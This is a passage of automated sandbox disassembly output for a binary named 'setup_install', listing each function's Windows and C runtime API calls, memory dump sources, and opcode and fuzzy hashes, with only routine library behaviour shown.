                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$Process$CloseCurrentErrorHandleLastOpen
                                        • String ID:
                                        • API String ID: 1444142086-0
                                        • Opcode ID: 35796f80068f4f09fba722cf61b49730b32969ba8f55944c5feff680450829d9
                                        • Instruction ID: 357e0e951a0f0153f5a2a03bb664550280ea092aedc4a642048f84f4c00ed357
                                        • Opcode Fuzzy Hash: 35796f80068f4f09fba722cf61b49730b32969ba8f55944c5feff680450829d9
                                        • Instruction Fuzzy Hash: 13113C7068C2098FEB00BF79D98870A7FA9FB46715FA04668E825C6280EB71C450CF52
                                        APIs
                                          • Part of subcall function 64941A70: EnterCriticalSection.KERNEL32 ref: 64941A84
                                          • Part of subcall function 64941A70: LeaveCriticalSection.KERNEL32 ref: 64941AAB
                                        • CloseHandle.KERNEL32 ref: 64942468
                                        • CloseHandle.KERNEL32 ref: 64942473
                                        • LeaveCriticalSection.KERNEL32 ref: 6494247E
                                        • DeleteCriticalSection.KERNEL32 ref: 64942490
                                        • DeleteCriticalSection.KERNEL32 ref: 6494249B
                                        • DeleteCriticalSection.KERNEL32 ref: 649424A6
                                        • free.MSVCRT ref: 649424B4
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Delete$CloseHandleLeave$Enterfree
                                        • String ID:
                                        • API String ID: 2365459708-0
                                        • Opcode ID: b2e54ad497030685eb8f430f96036894510ccd61e6e303160f30dab636b153cb
                                        • Instruction ID: e4d0f767930242d14d9f140bdae61370ffb6b9dfd869e63967bd870cf6bbd697
                                        • Opcode Fuzzy Hash: b2e54ad497030685eb8f430f96036894510ccd61e6e303160f30dab636b153cb
                                        • Instruction Fuzzy Hash: 1F01B0B6A486048FDB00BFBDE5845ADBBF4EF95310F120969D8859B314E734E859CF82
                                        APIs
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • fprintf.MSVCRT ref: 64942DBC
                                        • exit.MSVCRT ref: 64942DC8
                                          • Part of subcall function 649442C0: Sleep.KERNEL32(?,?,?,?,?,?,649432B2,?,?,?,?,649433EF,00000000,64944CE0), ref: 649442F8
                                        Strings
                                        • ../../src/winpthreads/src/mutex.c, xrefs: 64942D9E
                                        • Assertion failed: (%s), file %s, line %d, xrefs: 64942DB1
                                        • ., xrefs: 64942D96
                                        • (m_->valid == LIFE_MUTEX) && (m_->busy > 0), xrefs: 64942DA6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$exitfprintf
                                        • String ID: (m_->valid == LIFE_MUTEX) && (m_->busy > 0)$.$../../src/winpthreads/src/mutex.c$Assertion failed: (%s), file %s, line %d
                                        • API String ID: 24197342-167680671
                                        • Opcode ID: 2a1a87fcbea5f533f3c7bf2cdf43afd599c0b5f4ada067f7f73fef34ede2514e
                                        • Instruction ID: 4aba806da49f89240c60b9a25d1a7dee6be729d2f5a8f18e51f839b6aae9a212
                                        • Opcode Fuzzy Hash: 2a1a87fcbea5f533f3c7bf2cdf43afd599c0b5f4ada067f7f73fef34ede2514e
                                        • Instruction Fuzzy Hash: 8C01F6B5688311DBEB15EF24E58160ABBE4BB95348F058959E888CB319D370D894CB53
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memmove$memcpy
                                        • String ID:
                                        • API String ID: 3033661859-0
                                        • Opcode ID: f41e843d43a0eeaef59bcf24db1e08d837a31bdf54fb2eec86d79bb60b35a7a0
                                        • Instruction ID: dcf836f1785cbb93a3de1e3eea0110dc893824053c3af87d4a1e44953c41eae0
                                        • Opcode Fuzzy Hash: f41e843d43a0eeaef59bcf24db1e08d837a31bdf54fb2eec86d79bb60b35a7a0
                                        • Instruction Fuzzy Hash: 2291E3759093118BC754EF28C18046EBBE1FF8A704F158C2EF98597324E739E895CB9A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memmove$memcpy
                                        • String ID:
                                        • API String ID: 3033661859-0
                                        • Opcode ID: f0e4a1917a5d97b120202294713ef431dfab8b06330f5f16d5753bb4d5dcb9fb
                                        • Instruction ID: 87f5d2545a6ca0b03ba28ee0523edafa10f84fb2297b9de1022d2ddf20a7a980
                                        • Opcode Fuzzy Hash: f0e4a1917a5d97b120202294713ef431dfab8b06330f5f16d5753bb4d5dcb9fb
                                        • Instruction Fuzzy Hash: 528116719097908FC301EF28C09052EFBE1BF89B45F148D5EE4C897312D678EA85DB86
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno_fileno_lseeki64
                                        • String ID:
                                        • API String ID: 1152433503-0
                                        • Opcode ID: 3e8d69dbfdde61e65ea1d725896c537663441bcb1e748483c4fd908bca001767
                                        • Instruction ID: ebfcf62a9414a9ceabab88c7ed59cd3fa5b1dd0921d3db538ec35c4d2a8e784b
                                        • Opcode Fuzzy Hash: 3e8d69dbfdde61e65ea1d725896c537663441bcb1e748483c4fd908bca001767
                                        • Instruction Fuzzy Hash: 2C915D716083118FC710CF18C58075BBBE1BFC8754F198A5EE8989B351D3B5E989CB96
                                        APIs
                                        • GetLastError.KERNEL32 ref: 64945439
                                          • Part of subcall function 64944E00: TlsGetValue.KERNEL32 ref: 64944E3B
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • SetLastError.KERNEL32 ref: 6494547D
                                        • realloc.MSVCRT ref: 649454A7
                                        • realloc.MSVCRT ref: 649454BD
                                        • memset.MSVCRT ref: 649454EB
                                        • memset.MSVCRT ref: 64945509
                                          • Part of subcall function 649442C0: Sleep.KERNEL32(?,?,?,?,?,?,649432B2,?,?,?,?,649433EF,00000000,64944CE0), ref: 649442F8
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$ErrorLastmemsetrealloc$Value
                                        • String ID:
                                        • API String ID: 2283913283-0
                                        • Opcode ID: 29924c0cec7f9c1b97b2a3b07278f7db75e3e6a7a15f6061b0f5bb9257cd6a5e
                                        • Instruction ID: e749575d6f3396a8bd972d71088d537f833ff07f18f1dbfd7086c7d2c8bc232d
                                        • Opcode Fuzzy Hash: 29924c0cec7f9c1b97b2a3b07278f7db75e3e6a7a15f6061b0f5bb9257cd6a5e
                                        • Instruction Fuzzy Hash: C33135B4A482148FDB10DFA8D48469DBBF5FF88314F11856AE948DB305D734E940CF91
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 00411006
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00411012
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00411081
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_once
                                        • String ID:
                                        • API String ID: 3726264613-0
                                        • Opcode ID: 389acb5a3875232dfac94150f2ce74748c7301f679ac0e6c0fa75785274f7b5e
                                        • Instruction ID: 1561e78fa5ec91c0c74266f4cf36cfd96f00dd1589e0292ea51b72573b3d25dc
                                        • Opcode Fuzzy Hash: 389acb5a3875232dfac94150f2ce74748c7301f679ac0e6c0fa75785274f7b5e
                                        • Instruction Fuzzy Hash: 7D217171A08381CFCB14DF55D4C06ABBFE4AB49354F05846FEA844B726C778E8C58B6A
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno_filelengthi64_filenofflushfgetposfsetpos
                                        • String ID:
                                        • API String ID: 4183758535-0
                                        • Opcode ID: 3a8db24a24652df49a7dd3926f6c8e15cf24a093d281d193550af0be8360b953
                                        • Instruction ID: c8421b0909eb61effec7e16545f80ae01fbb70023316934024187565de276744
                                        • Opcode Fuzzy Hash: 3a8db24a24652df49a7dd3926f6c8e15cf24a093d281d193550af0be8360b953
                                        • Instruction Fuzzy Hash: C0116AB1A087048BC310AF2A8A8109FBBE4EFD5364F14491FF89083261E37999D5CFD6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrlenwcsftime
                                        • String ID:
                                        • API String ID: 3412479102-0
                                        • Opcode ID: 8bcf1e0409a426779bc0b4336c5919611b323013ce8852c1e2b0434524578bda
                                        • Instruction ID: 68a8b9f67b603b6b09b1dc660721eb38201e09b22ba216dd8d83e9e81b4a473f
                                        • Opcode Fuzzy Hash: 8bcf1e0409a426779bc0b4336c5919611b323013ce8852c1e2b0434524578bda
                                        • Instruction Fuzzy Hash: F31196B05097049FC740AF6AC58565FBBE4EF88754F41882EF5C887312E77898809B96
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: setlocale$memcpystrftimestrlen
                                        • String ID:
                                        • API String ID: 1843691881-0
                                        • Opcode ID: 9403e5def275ba0b8540ecb2bb33aa4401a2af8177eae152ad3c8d85c52fb55f
                                        • Instruction ID: 9fa99a6fed446b8ef44ffb222bdee63a05996e6373abd8e18ae67517507b43b8
                                        • Opcode Fuzzy Hash: 9403e5def275ba0b8540ecb2bb33aa4401a2af8177eae152ad3c8d85c52fb55f
                                        • Instruction Fuzzy Hash: 4711D3B0509704AFC740AF69D185B5FBBE4EF88354F81882EF5C887312E77898808B96
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: _errno$fflush
                                        • String ID:
                                        • API String ID: 3480992530-0
                                        • Opcode ID: df87191ea9b3f795a1bff5663397f0fd10b925e813985b099d6b1edb9c8595f1
                                        • Instruction ID: 6a8925a3a0bf5984e5828f8074cd4c62f725c93742b8e1f22d23ff8213994aed
                                        • Opcode Fuzzy Hash: df87191ea9b3f795a1bff5663397f0fd10b925e813985b099d6b1edb9c8595f1
                                        • Instruction Fuzzy Hash: EAF0AF722046149FC7117F6EAC44617FBD8EFA1725F4600BBE944CB321E63598048BB7
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CloseHandleValue
                                        • String ID:
                                        • API String ID: 492146193-0
                                        • Opcode ID: 0cec09cb84d1321a74f41817f8a73f39845058d0ffcf786624025ef096e8d7e6
                                        • Instruction ID: bbd8e6d3a573a2771462347b6a3c7fe5a6cd6c1b33bd62fb3846026ebd56962b
                                        • Opcode Fuzzy Hash: 0cec09cb84d1321a74f41817f8a73f39845058d0ffcf786624025ef096e8d7e6
                                        • Instruction Fuzzy Hash: D451E2B49442048FEB40EFB8D588B9ABBF8EB14324F4045A9DE54CB249E774D994CB92
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 004112CE
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004112DA
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 0041135E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_lockpthread_mutex_unlockpthread_once
                                        • String ID: <sI
                                        • API String ID: 3726264613-3642889959
                                        • Opcode ID: 823439ae370b6d9e8dd99fd493ccd695e53b66accd617e7d5f901c134a067028
                                        • Instruction ID: e715b7580858df6ff038ecce1a2212f6f3e894c3c45dde0033b5df1526f4bedf
                                        • Opcode Fuzzy Hash: 823439ae370b6d9e8dd99fd493ccd695e53b66accd617e7d5f901c134a067028
                                        • Instruction Fuzzy Hash: 1E31807060834E8F9710EF6AD8805DBBBE4AB44714F00842FED588B715E778E8C58B9E
                                        APIs
                                        • memcpy.MSVCRT ref: 0044AB91
                                        • memchr.MSVCRT ref: 0044ABB5
                                          • Part of subcall function 00482790: pthread_once.LIBWINPTHREAD-1(?,?,?,?,00427A14), ref: 004827A2
                                          • Part of subcall function 00491410: setlocale.MSVCRT ref: 0049142A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memchrmemcpypthread_oncesetlocale
                                        • String ID: -$.
                                        • API String ID: 3643807795-3807043784
                                        • Opcode ID: 6372df029f19df60a0bbe571758595a36adb2cbb82d87d2135b5c635555398c9
                                        • Instruction ID: 9536ce24123eb485ffeace566dcec9c8a6c6153940544d0955b857e649918632
                                        • Opcode Fuzzy Hash: 6372df029f19df60a0bbe571758595a36adb2cbb82d87d2135b5c635555398c9
                                        • Instruction Fuzzy Hash: 76D135B1D043598FDB04EFA9C08059EBBF1BF88304F14896EE8A4A7355D738E955CB86
                                        APIs
                                        • memcpy.MSVCRT ref: 0044AFFB
                                        • memchr.MSVCRT ref: 0044B01F
                                          • Part of subcall function 00482790: pthread_once.LIBWINPTHREAD-1(?,?,?,?,00427A14), ref: 004827A2
                                          • Part of subcall function 00491410: setlocale.MSVCRT ref: 0049142A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memchrmemcpypthread_oncesetlocale
                                        • String ID: .$6
                                        • API String ID: 3643807795-4089497287
                                        • Opcode ID: 42651bb668afe974945c6c8e24532d68f7275f67bd62457f4fe85df8a72df5e4
                                        • Instruction ID: e3a3f30276567f323ef97ab1a2b1f8ec4e73b3d91036b87995926d52181019ae
                                        • Opcode Fuzzy Hash: 42651bb668afe974945c6c8e24532d68f7275f67bd62457f4fe85df8a72df5e4
                                        • Instruction Fuzzy Hash: 45D106B19083599FDB04DFA9C48059EBBF0FF88304F058A6EE8A4A7352D738D945CB95
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: lambda($}$CJ$CJ
                                        • API String ID: 0-3310585947
                                        • Opcode ID: 441eb3c19a75e4cd08fa971b4aa8a46ca7b7d5688c279342bd3ced6d264a10ab
                                        • Instruction ID: e4c685f68e36493c3de3eab20776ee6ad7733e9f6dbd5019a48f61e0c8180bf1
                                        • Opcode Fuzzy Hash: 441eb3c19a75e4cd08fa971b4aa8a46ca7b7d5688c279342bd3ced6d264a10ab
                                        • Instruction Fuzzy Hash: 19517D755082418BCB15CF28C4C43E97BE1AFA5304F1984BEECC98F38ADBB99885DB55
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Byte$CharMultiWide$Lead_errno
                                        • String ID:
                                        • API String ID: 2766522060-0
                                        • Opcode ID: 3d110c38c04dedb10705c1fee61db960045614c58d8071325f48585bcbbfbc2a
                                        • Instruction ID: e1df8239732706b19f7a1152eb9ce1b6aa03ee6886cf15ccd66ca36cc3b23098
                                        • Opcode Fuzzy Hash: 3d110c38c04dedb10705c1fee61db960045614c58d8071325f48585bcbbfbc2a
                                        • Instruction Fuzzy Hash: 2B41F3B464D3408FE700DF29D48430ABFF4BF86314F11895DE8A887294D7B6D849DB92
                                        APIs
                                        • GetSystemTimeAsFileTime.KERNEL32 ref: 64948677
                                        • GetCurrentProcessId.KERNEL32 ref: 64948688
                                        • GetCurrentThreadId.KERNEL32 ref: 64948692
                                        • GetTickCount.KERNEL32 ref: 6494869A
                                        • QueryPerformanceCounter.KERNEL32 ref: 649486AB
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        • Associated: 00000002.00000002.1969648305.0000000064940000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969716587.000000006494A000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969752251.000000006494B000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969781602.000000006494C000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969823983.000000006494E000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969855112.000000006494F000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969910003.0000000064950000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969940222.0000000064952000.00000002.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1969972728.0000000064954000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970006322.0000000064957000.00000008.00000001.01000000.00000007.sdmp
                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                        • String ID:
                                        • API String ID: 1445889803-0
                                        • Opcode ID: 39d630acf8a10e325bf8393a203a850d2fc39212499cae56763eb60316805918
                                        • Instruction ID: 3c0d69edf1267f57d29deabde56ffa946d75d51e232b331b8cb747edc03d7a15
                                        • Opcode Fuzzy Hash: 39d630acf8a10e325bf8393a203a850d2fc39212499cae56763eb60316805918
                                        • Instruction Fuzzy Hash: C711B4B998C3008FD780EF69D54820ABBF6FBC9348F55092DE58897314DB35E9558F82
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno
                                        • String ID:
                                        • API String ID: 921712934-0
                                        • Opcode ID: 499c63470cdbf89e2615ba6370be02355d33aa1b6f751f52ec25b2eb9db2ee8d
                                        • Instruction ID: 322398f837b7dda2bb270cf3427a6bf94588ac9faee4a2c8fc40a3c81f214a7f
                                        • Opcode Fuzzy Hash: 499c63470cdbf89e2615ba6370be02355d33aa1b6f751f52ec25b2eb9db2ee8d
                                        • Instruction Fuzzy Hash: 880156B38042115EE6116B18FC413DA7750F712324F4606B7E454972A0D3796CE68BD6
                                        APIs
                                        Memory Dump Source
